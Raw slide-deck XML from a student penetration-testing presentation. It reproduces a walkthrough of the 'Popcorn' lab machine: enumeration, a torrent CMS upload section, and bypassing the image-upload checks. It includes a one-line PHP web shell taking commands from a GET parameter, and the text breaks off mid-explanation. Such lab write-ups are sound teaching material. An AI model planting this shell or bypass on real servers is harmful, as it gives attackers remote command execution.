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9725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8299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31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414843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97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224206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91527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5623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2112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18178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2076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11199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84471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1547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26337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1775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pc="25"/>
              <a:t>Page </a:t>
            </a:r>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="70" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr spc="-215"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-254"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15"/>
              <a:t>7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7682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xploit-db.com/exploits/1433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0AB4C-5AA6-436E-BD12-D8B62FABF829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1644316" y="1106877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INDIAN INSTITUTE OF INFORMATION TECHNOLOGY,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ALLAHABAD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Indian Institute of Information Technology, Allahabad - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FD760CD-2DB6-4FE6-AE19-CA23005B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" y="1106877"/>
            <a:ext cx="1171074" cy="11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0A812-A1C6-4301-9C0E-861062F3566F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="3124200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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PENETRATION TESTING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EB8C-2551-433A-8301-A6494B6EB00A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="54102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GROUP MEMBERS:-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   SOUMYADEEP BASU IIT2018001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   KUMAR UTKARSH    IIT2018007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   ROHIT HAOLADER   IIT2018008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   RAUSHAN RAJ         IIT2018031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   SURYASEN SINGH     IIT2018069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1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5" y="6553200"/>
            <a:ext cx="1581150" cy="158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4325" y="6416675"/>
            <a:ext cx="17075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24242"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="125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3600" spc="50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="-5" dirty="0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sz="3600" spc="125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3600" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="424242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025" y="7131329"/>
            <a:ext cx="354330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b="1" spc="-135" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" b="1" spc="-202" baseline="34722" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>th </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>October </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-65" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>2017 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Document </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-1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400" b="1" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>D17.100.16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7025" y="7472484"/>
            <a:ext cx="239077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b="1" spc="-25" dirty="0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Prepared </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-30" dirty="0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>By: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-25" dirty="0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Alexander </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-15" dirty="0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Reid</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-15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(Arrexel)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4325" y="7616176"/>
            <a:ext cx="142176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100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-5" dirty="0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Machine </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-40" dirty="0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Author:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-14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ch4p  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-45" dirty="0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Difficulty: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6AF3D"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Medium  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-25" dirty="0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Classification: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Official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4700"/>
            <a:ext cx="7772400" cy="2381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1531" y="7091362"/>
            <a:ext cx="3667125" cy="535940"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3667125" h="535940">
                <a:moveTo>
                  <a:pt x="2512225" y="321475"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="321475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="535787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2512225" y="535787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2512225" y="321475"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3667125" h="535940">
                <a:moveTo>
                  <a:pt x="3667125" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="59537" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59537" y="285750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3667125" y="285750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3667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0215" y="7543692"/>
            <a:ext cx="34290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" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Report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51634" y="7417593"/>
            <a:ext cx="571500" cy="250190"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="571500" h="250190">
                <a:moveTo>
                  <a:pt x="571500" y="250031"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="250031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="571500" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="571500" y="250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2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400488"/>
            <a:ext cx="576707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343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SYNOPSIS</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080" algn="just">
              <a:lnSpc>
                <a:spcPct val="130700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="540"/>
              </a:spcBef>
            </a:pP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Popcorn,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while not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overly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complicated,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contains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quite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bit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of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content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can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be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difficult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for  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>some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users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locate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proper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attack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vector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at </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-75" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>first.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This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machine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mainly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focuses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on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different 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methods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of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web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-114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exploitation.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4924488"/>
            <a:ext cx="240919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99CC13"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Skills</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99CC13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99CC13"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Required</a:t>
            </a:r>
            <a:endParaRPr sz="14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Basic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knowledge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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-18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Linux</a:t>
            </a:r>
            <a:endParaRPr sz="11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Enumerating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ports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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-17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services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0175" y="4924488"/>
            <a:ext cx="225234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99CC13"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Skills</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-70" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99CC13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99CC13"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Learned</a:t>
            </a:r>
            <a:endParaRPr sz="14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100" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Bypassing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upload</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-15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checks</a:t>
            </a:r>
            <a:endParaRPr sz="11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4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Modifying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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10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requests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515475"/>
            <a:ext cx="7772400" cy="542925"/>
            <a:chOff x="0" y="9515475"/>
            <a:chExt cx="7772400" cy="542925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="9639299"/>
              <a:ext cx="7772400" cy="409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1" y="9515475"/>
              <a:ext cx="7769225" cy="542925"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7769225" h="542925">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7768828" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7768828" y="542925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="542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7772400" cy="2084705"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7772400" cy="208470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7772400" cy="1276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0662"/>
              <a:ext cx="7772400" cy="2063750"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7772400" h="2063750">
                  <a:moveTo>
                    <a:pt x="7772400" y="142875"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7756487" y="142875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7756487" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1301724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2724150" y="1301724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2724150" y="2063724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="2063724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="1428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3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809813"/>
            <a:ext cx="105537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424242"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Enumeration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400" b="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="99CC13"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Nmap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2647950"/>
            <a:ext cx="59436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711301"/>
            <a:ext cx="5833110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100"/>
              </a:spcBef>
            </a:pP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Nmap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only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reveals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two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open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services;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343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>OpenSSH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Apache.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Loading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website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reveals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only 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default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Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-8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page.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563100"/>
            <a:ext cx="7772400" cy="495300"/>
            <a:chOff x="0" y="9563100"/>
            <a:chExt cx="7772400" cy="495300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="9639299"/>
              <a:ext cx="7772400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63100"/>
              <a:ext cx="7772400" cy="495300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7772400" h="495300">
                  <a:moveTo>
                    <a:pt x="0" y="495300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="49530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7772400" cy="1767205"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7772400" cy="176720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7772400" cy="1276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7772400" cy="1767205"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7772400" h="1767205">
                  <a:moveTo>
                    <a:pt x="7772400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7756512" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7667625" y="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1322387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1560512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104775" y="1560512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104775" y="1322387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7124700" y="1322387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7124700" y="1766900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="1766900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="442925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="13812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4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676463"/>
            <a:ext cx="776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99CC13"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Dirbuster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2114550"/>
            <a:ext cx="5943600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015977"/>
            <a:ext cx="588835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700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Dirbuster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reveals,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among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other things,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b="1" spc="-50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directory.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In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directory there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site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with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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-75" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>title </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-45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b="1" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Hoster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,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which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appears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be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an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open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source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hosting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template/CMS.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Fuzzing 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directory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reveals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many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more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files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directories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343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(not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343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>all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shown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in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screenshot).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1021" y="6886575"/>
            <a:ext cx="4083137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9527381"/>
            <a:ext cx="7772400" cy="531495"/>
            <a:chOff x="0" y="9527381"/>
            <a:chExt cx="7772400" cy="531495"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="9639299"/>
              <a:ext cx="7772400" cy="409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27381"/>
              <a:ext cx="7772400" cy="531495"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7772400" h="531495">
                  <a:moveTo>
                    <a:pt x="0" y="531018"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="531018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="531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7772400" cy="1398270"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7772400" cy="139827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7772400" cy="12763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7772400" cy="1398270"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7772400" h="1398270">
                  <a:moveTo>
                    <a:pt x="7772400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="39281" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3568" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1397800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39281" y="1397800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39281" y="1290650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="129065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5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809813"/>
            <a:ext cx="55448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24242"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Exploitation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30700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1065"/>
              </a:spcBef>
            </a:pP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Looking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around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site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85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>bit,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there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quite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few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potential attack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vectors.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most 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promising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option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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Upload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section,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which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requires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authorization. Luckily,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there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are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no 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restrictions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on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account</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-14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creation.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265" y="3028950"/>
            <a:ext cx="5870784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330302"/>
            <a:ext cx="594741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100"/>
              </a:spcBef>
            </a:pP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After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grabbing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any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existing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(or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creating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new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one)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creating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torrent,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possible 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edit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listing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add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more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information. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Due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poor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filtering,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possible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upload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35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>PHP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through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screenshot upload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feature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on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edit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page.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upload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contains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two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checks;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that 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includes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valid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image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extension,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also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that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55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>POST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data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Content-Type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set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image/png.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1247775">
              <a:lnSpc>
                <a:spcPct val="130700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="975"/>
              </a:spcBef>
            </a:pP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Creating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35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>PHP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named </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>writeup.png.php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with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contents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of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&lt;?php </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>echo  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>system($_GET[‘cmd’]); </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>?&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-65" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>will </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>pass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first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check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with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no</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-18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issues.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8201025"/>
            <a:ext cx="50101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9586912"/>
            <a:ext cx="7772400" cy="471805"/>
            <a:chOff x="0" y="9586912"/>
            <a:chExt cx="7772400" cy="471805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="9639299"/>
              <a:ext cx="7772400" cy="409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86924"/>
              <a:ext cx="7772400" cy="471805"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7772400" h="471804">
                  <a:moveTo>
                    <a:pt x="7772400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0" y="440524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="471474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="471474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="440524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="30956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7772400" cy="1612265"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7772400" cy="161226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7772400" cy="12763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7772400" cy="1612265"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7772400" h="1612265">
                  <a:moveTo>
                    <a:pt x="7772400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="396468" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15468" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1612112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396468" y="1612112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396468" y="1409712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="140971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6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624952"/>
            <a:ext cx="573913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100"/>
              </a:spcBef>
            </a:pP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To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343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>bypass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343744"/>
                </a:solidFill>
